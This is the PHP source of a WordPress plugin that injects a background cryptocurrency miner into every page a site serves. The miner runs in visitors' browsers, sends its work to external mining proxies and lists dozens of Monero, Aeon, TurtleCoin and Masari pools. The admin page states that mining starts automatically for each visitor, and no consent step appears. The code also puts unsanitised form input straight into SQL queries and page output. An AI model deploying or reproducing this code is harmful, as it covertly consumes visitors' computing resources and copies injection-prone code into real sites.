<?php
/**
 * Plugin Name: Rhino Website Miner for Wordpress
 * Plugin URI: http://monerominer.rocks
 * Description: Easily monetize your website with our web-based Rhino Website Miner.
 * Version: 1.1.0
 * Author: MoneroMiner.Rocks
 * Author URI: http://monerominer.rocks
 */

register_activation_hook( __FILE__, 'rm_miner_install' );
add_action( 'admin_menu', 'register_menu' );
add_action( 'wp_footer', 'add_miner' );

function rm_miner_install () {
    global $wpdb;

    $sql = '';
    $update_wallets = false;
    $charset_collate = $wpdb->get_charset_collate();

    $table_name = 'rm_wp_miner_coins';
    if($wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
        $sql .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          coin_abbreviation tinytext NOT NULL,
          coin_name tinytext NOT NULL,
          active boolean DEFAULT 1 NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
    } else {
        $wpdb->query("DELETE FROM `$table_name`");
    }

    $table_name = 'rm_wp_miner_pools';
    if($wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
        $sql .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          coin_id tinytext NOT NULL,
          active boolean DEFAULT 1 NOT NULL,
          url text NOT NULL,
          url_pool text NOT NULL,
          port text NOT NULL,
          empty_password text NULL,
          algorithm text NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
    } else {
        $wpdb->query("DELETE FROM `$table_name`");
    }

    $table_name = 'rm_wp_miner_wallets';
    if($wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
        $sql .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          coin_id tinytext NOT NULL,
          name tinytext NOT NULL,
          short_code tinytext NOT NULL,
          address text NULL,
          wallet_url varchar(55) DEFAULT '' NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
        $update_wallets = true;
    } else {
        // Fix for duplicate wallets.
        $wallets = $wpdb->get_results("SELECT * FROM ".$table_name." GROUP BY short_code");
        foreach((array)$wallets as $key => $wallet) {
            $id_check = $wallet->id;
            $dups = $wpdb->get_results("SELECT * FROM ".$table_name." WHERE short_code = '".$wallet->short_code."' AND id != ".$id_check);
            foreach((array)$dups as $dkey => $dupe) {
                $wpdb->query("DELETE FROM ".$table_name." WHERE id = '".$dupe->id."'");
            }
        }
    }

    $table_name = 'rm_wp_miner_client';
    if($wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
        $sql .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          active boolean DEFAULT 1 NOT NULL,
          pool_id tinytext NOT NULL,
          threads tinytext NOT NULL,
          throttle tinytext NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
    }

    require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
    dbDelta( $sql );

    foreach (getCoins() as $key => $value) {
        $wpdb->insert(
            "rm_wp_miner_coins",
            array(
                'created' => current_time( 'mysql' ),
                'coin_abbreviation' => $value['coin_abbreviation'],
                'coin_name' => $key
            )
        );
    }

    if ($update_wallets) {
        foreach (getWallets() as $key => $value) {
            $wpdb->insert(
                "rm_wp_miner_wallets",
                array(
                    'created' => current_time( 'mysql' ),
                    'coin_id' => (int)$key,
                    'name' => $value['name'],
                    'short_code' => $value['short_code'],
                    'address' => $value['address'],
                    'wallet_url' => $value['wallet_url']
                )
            );
        }
        $wpdb->insert(
        "rm_wp_miner_client",
            array(
                'created' => current_time( 'mysql' ),
                'pool_id' => 0,
                'active' => 0,
                'threads' => -1,
                'throttle' => 60
            )
        );
    }

    foreach (getPools() as $key => $value) {
        $wpdb->insert(
            "rm_wp_miner_pools",
            array(
                'created' => current_time( 'mysql' ),
                'coin_id' => $value['coin'],
                'url' => $key,
                'url_pool' => $value['url'],
                'port' => $value['port'],
                'empty_password' => $value['emptypassword'] ? $value['emptypassword'] : '',
                'algorithm' => $value['algorithm']
            )
        );
    }
}

function register_menu() {
    add_menu_page(
        __( 'Miner', 'textdomain' ),
        'Miner',
        'manage_options',
        'rm-miner',
        'rm_miner_admin_page',
        plugins_url( 'rm-miner/images/icon.png' ),
        6
    );
    add_submenu_page(
        'rm-miner',
        __( 'Wallets', 'textdomain' ),
        'Wallets',
        'manage_options',
        'rm-wallets',
        'rm_wallets_page'
    );
    add_submenu_page(
        'rm-miner',
        __( 'Miner Settings', 'textdomain' ),
        'Settings',
        'manage_options',
        'rm-miner-settings',
        'rm_miner_settings_page'
    );
}

function rm_miner_admin_page(){
    global $wpdb;
    $pool_info = [];

    $table_name = "rm_wp_miner_client";
    $client = $wpdb->get_row( "SELECT * FROM $table_name");

    if ($client->pool_id) {
        $table_name = "rm_wp_miner_pools";
        $pool_info = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $client->pool_id");
    }
    ?>
    <div class="wrap">
        <h1>Rhino Miner for WordPress</h1>
        <p>Welcome to the Rhino Miner for WordPress.  This plugin easily allows you to utilize your users devices to mine cryptocurrencies through there web browsers.  Once the miner is configured and activated it will be injected into the frontend of your website.  The miner will automatically start in the background and mine cryptocurrency for each user that visits your website.</p>
        <p>Follow the steps below to set up your own wallet and configure the plugin.</p>
        <ol>
            <li>Determine what coin you would like to mine.  You can <a href="https://monerominer.rocks/cryptocurrency-coins/" target="_blank">click here</a> to learn about the coins that the Rhino Miner supports.</li>
            <li>Download your wallet or add an existing coin wallet address on the <a href="<?php echo admin_url( 'admin.php?page=rm-wallets' ); ?>" target="_blank">Wallets</a> page.  There is also a download like provided for each wallet on the Wallets page.</li>
            <li>Configure the miner on the <a href="<?php echo admin_url( 'admin.php?page=rm-miner-settings' ); ?>" target="_blank">Settings</a> section.</li>
            <li>Sit back and let the miner do the work.  You can check back on this page after everything has been configured to find a link to the pool.  Once on the pool's website you will be able to input your wallet address and see your mining statics and earnings.</li>
        </ol>
        <hr/>
        <?php if ($pool_info->url) { ?>
            <h3>Mining Statistics</h3>
            <ol>
                <li>Click the pool link below to navigate to the pool.</li>
                <li>Locate the wallet address tracking input and enter your wallet address to track your statistics and earnings.  This field may be located on another page called "Dashboard".  Each pool should have a tool that allows you to see your wallets statistics.</li>
            </ol>
            <i>Depending on the pool it may take a few minutes for the pools data to update.  You may not see any data until the pool accepts a share from the miner.</i>
            <p><b>Click the pool link below to navigate to the pool.</b></p>
            <p><a href="http://<?php echo $pool_info->url; ?>" target="_balnk"><?php echo $pool_info->url; ?></a></p>
            <hr/>
        <?php } ?>
        <p><a href="https://monerominer.rocks/contact/" target="_blank">Click here</a> to submit any feedback or improvements you would like to see.</p>
    </div>
    <?php
}

function rm_wallets_page() {
    global $wpdb;
    $message = '';

    if ($_POST) {
        foreach ($_POST as $key => $value) {
            if ($key != 'submit') {
                $wpdb->update(
                    "rm_wp_miner_wallets",
                    array(
                        'address' => $value,
                        'updated' => current_time( 'mysql' )
                    ),
                    array('short_code' => $key)
                );
            }
            $message = 'Wallets updated.';
        }
    }

    $table_name = "rm_wp_miner_wallets";
    $results = $wpdb->get_results( "SELECT * FROM $table_name");
    ?>
    <div class="wrap">
        <h1>Miner Wallets - Add your wallets here</h1>
        <?php
            if (!empty($message)) {
                ?>
                <div class="notice notice-success is-dismissible">
                    <p><?php _e( $message, 'textdomain' ); ?></p>
                </div>
                <?php
            }
        ?>
        <p>Add your wallet address for the coin that you plan on mining.  In order for the miner to work properly you will need to supply a wallet address so the pool can send you your earnings.  All earnings will come directly from the pool that you choose to mine on.</p>
        <p>No wallet?  No problem!  There is a "Get Wallet" link next to each wallet label so you can download the wallet and create your unique wallet address.</p>
        <p><b>IMPORTANT: All earnings and statistics from the pool are associated with the coins wallet address that you provide.  Statistics from the pool do not carry over form one address to another.  Each wallet address is treated as it's own entity.</b></p>
        <br/>
        <form method="post">
            <div id="universal-message-container">
                <h2>Wallet Addresses</h2>
                <?php
                    foreach ($results as $result) {
                        echo '<div class="options">';
                            echo '<p>';
                                echo '<label>'.$result->name.' - <a href="'.$result->wallet_url.'" target="_blank">Get Wallet</a></label>';
                                echo '<br/>';
                                echo '<input type="text" name="'.$result->short_code.'" value="'.$result->address.'" />';
                            echo '</p>';
                        echo '</div>';
                    }
                    submit_button();
                ?>
        </form>
    </div>
    <?php
}

function rm_miner_settings_page() {
        global $wpdb;
        $message_success = '';
        $message_error = '';

        if ($_POST) {
            $pool_id = $_POST['pool_id'];
            $wpdb->update(
                "rm_wp_miner_client",
                array(
                    'updated' => current_time( 'mysql' ),
                    'active' => $_POST['active'],
                    'pool_id' => $pool_id,
                    'threads' => $_POST['threads'],
                    'throttle' => $_POST['throttle']
                ),
                array('id' => 1)
            );
            $message_success = "Miner client updated";

            $table_name = "rm_wp_miner_pools";
            $pool_info = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool_id");

            $table_name = "rm_wp_miner_wallets";
            $coin = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool_info->coin_id");

            if (empty($coin->address)) {
                $message_error = "You do not have a wallet address associated with the coin ".$coin->name.".  Please visit the <a href=\"".admin_url( 'admin.php?page=rm-wallets' )."\">Wallets</a> page to add your wallet address for ".$coin->name." coin.";
            }
        }

        $table_name = "rm_wp_miner_pools";
        $pools = $wpdb->get_results( "SELECT * FROM $table_name");

        $table_name = "rm_wp_miner_client";
        $client = $wpdb->get_row( "SELECT * FROM $table_name");
    ?>
    <div class="wrap">
        <h1>Miner Settings - Set up the miner</h1>
        <?php
        if (!empty($message_success)) {
            ?>
            <div class="notice notice-success is-dismissible">
                <p><?php _e( $message_success, 'textdomain' ); ?></p>
            </div>
            <?php
        }
        if (!empty($message_error)) {
            ?>
            <div class="notice notice-error is-dismissible">
                <p><?php _e( $message_error, 'textdomain' ); ?></p>
            </div>
            <?php
        }
        ?>
        <p>We have already pre loaded some default miner values.</p>
        <form method="post">
            <div class="options">
                <p>
                    <label>Miner Activation</label>
                    <br/>
                    <input type="radio" <?php if ($client->active == 1) echo "checked"; ?> name="active" value="1"> On<br>
                    <input type="radio" <?php if ($client->active == 0) echo "checked"; ?> name="active" value="0"> Off<br>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>Pool</label>
                    <br/>
                    <select name="pool_id">
                        <?php foreach ($pools as $pool) { ?>
                            <option value="<?php echo $pool->id; ?>" <?php if ($pool->id == $client->pool_id) echo "selected"; ?>><?php echo $pool->url; ?></option>
                        <?php } ?>
                    </select>
                    <br/>
                    <i>Select the pool that you would like to mine on.</i>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>Threads</label>
                    <br/>
                    <input required type="text" name="threads" value="<?php echo $client->threads; ?>" />
                    <br/>
                    <i>The number of threads the miner uses. Use -1 for auto-config.</i>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>Throttle</label>
                    <br/>
                    <input required type="text" name="throttle" value="<?php echo $client->throttle; ?>" />
                    <br/>
                    <i>If you set this value to 20, the cpu workload will be approx. 80% (for 1 thread / CPU). Setting this value to 100 will not fully disable the miner but still calculate hashes with 10% CPU load.</i>
                </p>
            </div>
            <?php submit_button(); ?>
        </form>
    </div>
    <?php
}

function add_miner() {
    global $wpdb;

    $table_name = "rm_wp_miner_client";
    $client = $wpdb->get_row( "SELECT * FROM $table_name");

    if ($client->active) {
        $table_name = "rm_wp_miner_pools";
        $pool = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $client->pool_id");

        if ($pool->coin_id == 3) {
            $server = "wss://trtl504.rmminingproxy.com:8181";
            $file = plugin_dir_url( __FILE__ ).'/js/turtle.js';
        } else {
            $server = "wss://f.xmrminingproxy.com:8181";
            $file = plugin_dir_url( __FILE__ ).'/js/rm.js';
        }

        $table_name = "rm_wp_miner_wallets";
        $wallet = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool->coin_id");

        if ($wallet && $pool) {
            ?>
            <script src="<?php echo $file; ?>"></script>
            <script>
                var pool = "<?php echo $pool->url; ?>";
                var wallet_address = "<?php echo $wallet->address; ?>";
                var password = "<?php echo $pool->empty_password ?>";
                var threads = <?php echo $client->threads; ?>;
                var user = "WP";
                server = "<?php echo $server; ?>";
                startMining(pool, wallet_address, password, threads, user);
                throttleMiner = <?php echo $client->throttle; ?>;
            </script>
            <?php
        }
        ?>
    <?php
    }
}

function getCoins() {
    $coins = array(
        'Monero' => array(
            'coin_abbreviation' => 'XMR'
        ),
        'Aeon' => array(
            'coin_abbreviation' => 'AEON'
        ),
        'TurtleCoin' => array(
            'coin_abbreviation' => 'TRTL'
        ),
        'Masari' => array(
            'coin_abbreviation' => 'MSR'
        )
    );
    return $coins;
}

function getWallets() {
    $wallets = array(
        array (
            "wallet_url" => "https://mymonero.com/",
            "name" => "Monero",
            "short_code" => "XMR",
            "address" => ""
        ),
        array (
            "wallet_url" => "https://www.aeon.cash/",
            "name" => "Aeon",
            "short_code" => "AEON",
            "address" => ""
        ),
        array (
            "wallet_url" => "https://turtlecoin.lol/",
            "name" => "Turtle",
            "short_code" => "TRTL",
            "address" => ""
        ),
        array (
            "wallet_url" => "https://getmasari.org/",
            "name" => "Masari",
            "short_code" => "MSR",
            "address" => ""
        )
    );
    return $wallets;
}

function getPools() {
    return array (
        'xmrpool.eu' =>
            array (
                'coin' => 1,
                'url' => 'xmrpool.eu',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'moneropool.com' =>
            array (
                'coin' => 1,
                'url' => 'mine.moneropool.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'monero.crypto-pool.fr' =>
            array (
                'coin' => 1,
                'url' => 'xmr.crypto-pool.fr',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'monerohash.com' =>
            array (
                'coin' => 1,
                'url' => 'monerohash.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'minexmr.com' =>
            array (
                'coin' => 1,
                'url' => 'pool.minexmr.com',
                'port' => 4444,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'usxmrpool.com' =>
            array (
                'coin' => 1,
                'url' => 'pool.usxmrpool.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'supportxmr.com' =>
            array (
                'coin' => 1,
                'url' => 'pool.supportxmr.com',
                'port' => 5555,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'moneroocean.stream:100' =>
            array (
                'coin' => 1,
                'url' => 'gulf.moneroocean.stream',
                'port' => 80,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'moneroocean.stream' =>
            array (
                'coin' => 1,
                'url' => 'gulf.moneroocean.stream',
                'port' => 10001,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'poolmining.org' =>
            array (
                'coin' => 1,
                'url' => 'xmr.poolmining.org',
                'port' => 3032,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'minemonero.pro' =>
            array (
                'coin' => 1,
                'url' => 'pool.minemonero.pro',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'xmr.prohash.net' =>
            array (
                'coin' => 1,
                'url' => 'xmr.prohash.net',
                'port' => 1111,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'minercircle.com' =>
            array (
                'coin' => 1,
                'url' => 'xmr.minercircle.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'xmr.nanopool.org' =>
            array (
                'coin' => 1,
                'url' => 'xmr-eu1.nanopool.org',
                'port' => 14444,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'xmrminerpro.com' =>
            array (
                'coin' => 1,
                'url' => 'xmrminerpro.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'clawde.xyz' =>
            array (
                'coin' => 1,
                'url' => 'clawde.xyz',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'dwarfpool.com' =>
            array (
                'coin' => 1,
                'url' => 'xmr-eu.dwarfpool.com',
                'port' => 8005,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'xmrpool.net' =>
            array (
                'coin' => 1,
                'url' => 'mine.xmrpool.net',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'monero.hashvault.pro' =>
            array (
                'coin' => 1,
                'url' => 'pool.monero.hashvault.pro',
                'port' => 5555,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'osiamining.com' =>
            array (
                'coin' => 1,
                'url' => 'osiamining.com',
                'port' => 4545,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'killallasics' =>
            array (
                'coin' => 1,
                'url' => 'killallasics.moneroworld.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn',
            ),
        'arhash.xyz' =>
            array (
                'coin' => 1,
                'url' => 'arhash.xyz',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn',
            ),
        'aeon-pool.com' =>
            array (
                'coin' => 2,
                'url' => 'mine.aeon-pool.com',
                'port' => 5555,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'minereasy.com' =>
            array (
                'coin' => 2,
                'url' => 'aeon.minereasy.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.sumominer.com' =>
            array (
                'coin' => 2,
                'url' => 'aeon.sumominer.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.rupool.tk' =>
            array (
                'coin' => 2,
                'url' => 'aeon.rupool.tk',
                'port' => 4444,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.hashvault.pro' =>
            array (
                'coin' => 2,
                'url' => 'pool.aeon.hashvault.pro',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.n-engine.com' =>
            array (
                'coin' => 2,
                'url' => 'aeon.n-engine.com',
                'port' => 7333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeonpool.xyz' =>
            array (
                'coin' => 2,
                'url' => 'mine.aeonpool.xyz',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeonpool.dreamitsystems.com' =>
            array (
                'coin' => 2,
                'url' => 'aeonpool.dreamitsystems.com',
                'port' => 13333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'aeonminingpool.com' =>
            array (
                'coin' => 2,
                'url' => 'pool.aeonminingpool.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'aeonhash.com' =>
            array (
                'coin' => 2,
                'url' => 'pool.aeonhash.com',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'durinsmine.com' =>
            array (
                'coin' => 2,
                'url' => 'mine.durinsmine.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.uax.io' =>
            array (
                'coin' => 2,
                'url' => 'mine.uax.io',
                'port' => 4446,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon-pool.sytes.net' =>
            array (
                'coin' => 2,
                'url' => 'aeon-pool.sytes.net',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-lite/1',
            ),
        'aeonpool.net' =>
            array (
                'coin' => 2,
                'url' => 'pool.aeonpool.net',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'supportaeon.com' =>
            array (
                'coin' => 2,
                'url' => 'pool.supportaeon.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'pooltupi.com' =>
            array (
                'coin' => 2,
                'url' => 'pooltupi.com',
                'port' => 8080,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'aeon.semipool.com' =>
            array (
                'coin' => 2,
                'url' => 'pool.aeon.semipool.com',
                'port' => 3333,
                'emptypassword' => 'x',
                'algorithm' => 'cn-lite/1',
            ),
        'turtlepool.space' =>
            array (
                'coin' => 3,
                'url' => 'eu.turtlepool.space',
                'port' => 3333,
                'emptypassword' => '',
                'algorithm' => 'cn-pico/trtl',
            ),
        'turtle.hashvault.pro' =>
            array (
                'coin' => 3,
                'url' => 'pool.turtle.hashvault.pro',
                'port' => 80,
                'emptypassword' => 'x',
                'algorithm' => 'cn-pico/trtl',
            ),
        'masari.miner.rocks' =>
            array (
                'coin' => 4,
                'url' => 'masari.miner.rocks',
                'port' => 5005,
                'emptypassword' => '',
                'algorithm' => 'cn/half',
            ),
        'masari.hashvault.pro' =>
            array (
                'coin' => 4,
                'url' => 'pool.masari.hashvault.pro',
                'port' => 80,
                'emptypassword' => 'x',
                'algorithm' => 'cn/half',
            ),
        'etn.spacepools.org' =>
            array (
                'coin' => 5,
                'url' => 'pool.etn.spacepools.org',
                'port' => 80,
                'emptypassword' => '',
                'algorithm' => 'cn/0',
            ),
        'etn.nanopool.org' =>
            array (
                'coin' => 5,
                'url' => 'etn-eu1.nanopool.org',
                'port' => 13333,
                'emptypassword' => 'x',
                'algorithm' => 'cn/0',
            ),
        'etn.hashvault.pro' =>
            array (
                'coin' => 5,
                'url' => 'pool.electroneum.hashvault.pro',
                'port' => 80,
                'emptypassword' => 'x',
                'algorithm' => 'cn/0',
            ),
    );
}